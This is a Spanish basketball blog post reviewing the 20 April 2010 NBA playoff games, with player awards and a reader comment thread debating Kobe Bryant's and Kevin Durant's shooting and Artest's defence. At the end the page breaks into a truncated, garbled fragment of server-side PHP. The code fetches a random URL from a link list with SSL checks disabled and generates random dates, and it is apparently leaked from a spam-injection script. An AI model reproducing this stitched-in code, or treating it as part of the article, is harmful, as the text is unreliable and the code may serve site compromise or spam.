Playoffs 20/04/2010: “K” versus “K”

21 de April de 2010 por TheDeerHunter

Por fin pudimos disfrutar del duelo Kobe Bryant vs Kevin Durant en su mejor versión tras un primer partido en el que sus defensores se llevaron el gato al agua. En el intercambio de golpes y en un final apretado, Kobe sigue siendo un mal elemento contra el que apostar. La experiencia es un grado y durante los últimos 5 minutos, la Mamba volvió a picar mientras que Durant falló todo lo que lanzó. Los Thunder, logrando ponerse por delante en el último cuarto hasta en 3 ocasiones ,desperdiciaron una ocasión inmejorable para evitar el 2-0.

Hasta ese momento, el choque se había desarrollado de forma sutilmente similar al primer partido. Los Lakers comenzaron imponentes, con Kobe acertado y Gasol&Bynum imponiéndose por dentro. También como el otro día flojearon a la entrada de la segunda unidad con un Odom poco resolutivo. Fue en ese momento cuando los visitantes desplegaron lo mejor de su increíble defensa, un muro de tapones que amedrentó a los locales. Hasta 17 gorros repartieron, 4 de ellos del señor Durant… pero ¡7 del señor Ibaka!. Se les hizo de noche a los Lakers, hasta el punto de finalizar la primera parte en desventaja. Durante el tercer cuarto los titulares amarillos lograron recuperar el suficiente aliento como para, como el otro día, poder lavar y guardar la ropa. En esta ocasión con mayores dificultades, pero hasta el mismo provechoso final. Ahora toca viajar a Oklahoma donde los Thunder no contarán con más margen de error.

Tampoco lo tenían los Suns. Como la defensa de McMillan les había hecho daño, Alvin Gentry optó por apostarlo todo a lo que mejor sabe hacer su equipo: correr como demonios. Anoche lo hicieron más que nunca, a un ritmo de más de 30 puntos por cuarto, con Jason Richardson de estilete, pillando continuamente descolocados los estudiados sistemas defensivos del equipo de Oregón. Sobra decir que no sólo fracasaron irremediablemente en el iluso intento de mantener el ritmo ofensivo de los Suns. Por si les faltaba poco, Batum se lesionó el hombro en un choque contra Nash. Sería cruelmente irónico que McMillan tuviera que volver a poner el destino de su equipo en manos de los desheredados Rudy Fernandez y Marcell Webster.

En Boston no se notó en absoluto la baja por sanción de Kevin Garnett. Si se llegó a notar fue en positivo, con un Glenn Davis desatado. Escaso recorrido tiene Miami si Wade se mata por el equipo y a lo más que aspiran es a anotar menos de 80 puntos. Demasiado bien tendrían que emplearse en defensa y en veladas como la de anoche de Ray Allen eso es completamente imposible. Mucho me temo que esta es la puntilla a la eliminatoria, aunque Wade, por él mismo, no se va a rendir nunca.

Lo mismo podemos concluir de la Hawks-Bucks, aunque de eso ya éramos conscientes casi todos. 2º partido y 2ª muestra de impotencia por parte de los ciervos. Los únicos que salvaron mínimamente la honra fueron Salmons, Stackhouse e Ilyasova. La eliminatoria pasa a Milwaukee, aunque será difícil que la situación cambie demasiado.

PREMIOS

MVP: El último cuarto de Kobe Bryant fue decisivo para que los Lakers se llevaran una sufrida victoria ante los Thunder. A pesar de todas las molestias que arrastra el escolta angelino acabó con 39 puntos. De todas maneras, Josh Smith tuvo una actuación estadísticamente más completa: 21 puntos (9 de 11), 14 rebotes, 9 asistencias, 2 robos y 2 tapones.

Rookie: 28 minutos, 6 puntos, 5 rebotes y 7 tapones. Buenos números de Serge Ibaka.

Sorpresa: Ante la baja de Kevin Garnett reapareció Glen Davis que parece sólo vive para los Playoffs. 23 puntos y 8 rebotes para él. En los Suns, Grant Hill falló un solo tiro a canasta de sus 11 intentos finalizando con 20 puntos a los que sumó 8 rebotes.

Decepción: Patéticos los compañeros de Dwyane Wade en general y Jermaine O’Neal en particular. 1 de 10 para el pívot para sólo 2 puntos. Los playoffs les vienen grandes a todos.

Esfuerzo en vano: Wade contra el mundo, un mundo que incluye a sus compañeros de equipo. 29 puntos con un gusto amarguísimo. Seguro que en la habitación de su hotel ya tiene folletos de viajes a NY o Chicago, por ejemplo.

Y MAÑANA…

Bobcats y Spurs intentarán evitar el 2-0 en las eliminatorias y a tenor de lo sucedido en los primeros partidos no están tan lejos de lograrlo.

Comenta

20 comentarios a esta entrada

  1. Txusma dice:
    #1

    Pero sí la mejor versión de Kobe y Durant incluye 30 canastas falladas de 54 intentos y 12 pérdidas vamos listos… 😀 Aún espero mucho más de ambos.
    Y me ha sorprendido lo bien que han jugado los Celtics sin Garnett. No será q ahora mismo su presencia es más perjudicial que beneficiosa? Es decir, al estar Garnett se le sigue otortgando un rol de super estrella con sus tiros y sus responsabilidades a pesar de que Garnett está al 60% de sus capacidades. Sin él, el resto de jugadores aprietan los machos y todos están al 100%.

      Citar

  2. TheDeerHunter dice:
    #2

    Pues ya te digo yo que firmaba todos los días para mí un 55% de acierto lanzando 25 tiros. Te aseguro que no estaría aquí comentando la jugada, sino que vosotros estaríais comentando MIS jugadas.

    Lo de las 12 pérdidas, me lo reservaba para cuando alguien comente lo mal que defendió Artest a Durant anoche, así que gracias por la destripada. 8 pérdidas son de Durant y en el momento decisivo volvió a pasarlo mal con el gladiador amarillo. Para mí la actuación de Artest sigue siendo de notable alto, y si no es un sobresaliente es por su completa incapacidad ofensiva.
    También hay que reconocer que en esta ocasión Durant sí metió lo fácil durante el partido… que son esos 4-5 tiros que le hubieran salvado del gran fracaso el otro día… y defensivamente estuvo increible.

      Citar

  3. Txusma dice:
    #3

    Han firmado un 45% de acierto, que no está mal pero a mi a veces me duele ver un 12 de 28 como el que se ha marcado Kobe. Sobre lo de las pérdidas ya me imaginaba que iba por ahí en incluso quería comentar q de momento la sensación es que Artest le gana la partida al de Oklhoma en su duelo particular.

      Citar

  4. pcerezo dice:
    #4

    No os parece que viendo las eliminatorias de Bucks y Heat se demuestra que la quinta y sexta plaza del Este son una mentira? Estoy seguro que no luchaban ni por PO en el Oeste.

    Pues hablando de elecciones fallidas, que os parece el número dos de Beasley?

      Citar

  5. sergio dice:
    #5

    Yo t lo dire pcerezo… Beasley, hasta ahora, apesta….

      Citar

  6. pcerezo dice:
    #6

    Sergio que conste que lo has dicho tú…jjj Es la misma sensación que tengo desde el año pasado…un blufff de pelotas. Esta eliminatoria lleva a Wade a NY o Chicago?

      Citar

  7. TheDeerHunter dice:
    #7

    Ups… es verdad. Lo de 30 de 54 que te referías eran los tiros fallados. Me he rallado.
    Aún así, para que te hagas una composición de lugar, un señor que se llamaba Michael Jordan, en los años de su segundo threepeat en playoffs anotó respectivamente un 45,9% (1996), 45,6% (1997) y un 46,2% (1998) y fue aclamado y adorado por ese motivo (y con razón, por cierto)

    Lo que quiero decir es que, por mucho que algunos lo enarbolen como un mega-defecto en algún caso (no mentaré a AI por si se lía) para un exterior con mucha participación, anotar alrededor de un 45% es más normal (y correcto) de lo que la mayoría de gente piensa.

      Citar

  8. pcerezo dice:
    #8

    Esos porcentajes son los normales para un escolta estrella de la liga y ya son altos.
    Lo de las 12 pérdidasa es más analizable pero hay que tener en cuenta que esto de los PO es otra liga y las defensas son otra cosa…

      Citar

  9. Txusma dice:
    #9

    Yo sólo quería comentar lo de “mejor versión”. Ambos han tenido partidos mejores que este por lo que aún podemos disfrutar de más espectáculo que al fin y al cabo es lo que queremos!

      Citar

  10. TheDeerHunter dice:
    #10

    estoy de acuerdo… lo de “mejor versión” es una forma de hablar, porque con lágrimas en los ojos vi a Kobe anotar 81 puntos que no olvidaré jamás.

    sin embargo, y comparando con el primer partido el nivel de espectáculo que nos ofrecieron anoche fue bastante bueno.

    No he dicho que veo a mejor nivel a los Lakers contra los Thunder que el año pasado contra Utah. También veo a los Thunder mucho mejor equipo que aquel.
    Los Lakers, a diferencia del año pasado, están poniendo la carne en el asador. Nadie dijo que iba a ser fácil.

      Citar

  11. CAMPO2 dice:
    #11

    Que os parece la ampliación de contrato de Camby?va a ganar mas dinero que nunca

      Citar

  12. Viva_Dirk dice:
    #12

    Vaya ejemplo pones Deer, en su segundo threepeat, donde era un año mas viejo que Kobe ahora y muchos mas que Durant. Estoy deacuerdo en que un 45% son porcentajes aceptables, pero hay ejemplos claros de grandes ‘exteriores con mucha participación’ que se movieron por encima de esas cifras en sus carreras, desde luego Jordan es un ejemplo claro de ello.

    Partido preocupante de los Lakers, y no estoy nada deacuerdo en lo de Artest, vamos a necesitar que cuando tire absolutamente solo anote alguna.

      Citar

  13. Mariano dice:
    #13

    pcerezo , yo creo que la posicion de los Bucks no es una mentira.. si Bogut hubiera estado en estos PO otra sería la historia.. estoy impaciente por ver a este equipo el año que viene, con la vuelta de Bogut y ojala de Redd, sumandoles a Jennings..

    solo eso.. hoy, espero que ganen los Spurs, para mi son candidatos y nadie lo nota..

      Citar

  14. Lagarto dice:
    #14

    Preocupantes Los Lakers una vez más.
    A mi Bogut, sinceramente, no me parece un nº1 de un Draft, que queréis que os diga…

      Citar

  15. CAMPO2 dice:
    #15

    Que mas hubo en el draft de bogut?

      Citar

  16. Txusma dice:
    #16

    Casi nada: Deron Williams, Chris Paul, Andrew Bynum, Marvin Williams, Danny Granger, David Lee, Monta Ellis…

      Citar

  17. pcerezo dice:
    #17

    Premio para los Bucks….

      Citar

  18. TheDeerHunter dice:
    #18

    Venga Viva… calificar a Jordan como “viejo” en su segundo threepeat me parece una broma. Físicamente estaba perfecto y técnicamente estaba mejor que nunca. Te lo admitiría si acaso cuando volvió con los Wizards… de todas formas no era en absoluto un comentario peyorativo. Todo lo contrario.
    Los exteriores que mencionas basaban mucha parte de su juego en estar cerca del aro.
    Es casi matemático que conforme tu juego se aleja del aro tu % de tiro disminuye. El mismo Jordan bajó porcentajes conforme fue ganando confianza en su tiro y no por ello fue menos peligroso.
    Insisto en que lo de exteriores con porcentajes por encima del 50% se pueden contar con los dedos y no siempre ha sido un aspecto especialmente diferencial.
    A veces los porcentajes son engañosos. ¿calificarías a Ray Allen como un mal tirador? pues clava el 45% durante su carrera.
    Estoy convencido de que estamos de acuerdo en este punto.

    De Artest, molaría que metiese alguna sí, sobre todo cuando esté sólo…. si te he de ser sincero preferiría que no rascase bola y que se las tiraran otros mejor preparados que él para eso (cualquier jugador de los Lakers, posiblemente) Lo que yo quiero de Artest es que ahogue a los Durant, Melo y LeBron que a priori nos vamos a encontrar por el camino. No lo está haciendo nada mal en ese sentido.

      Citar

  19. LEmontus dice:
    #19

    no te engañes artest(y cualquiera) defenderá a Durant cuando este no esté fino. Mientras tanto a ver como las enchufa.

    Lo de que la 5 y 6 plaza del este están vendidas…. mirate las series anda.

      Citar

  20. LEmontus dice:
    #20

    A Durant Melo Wade Kobe….

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>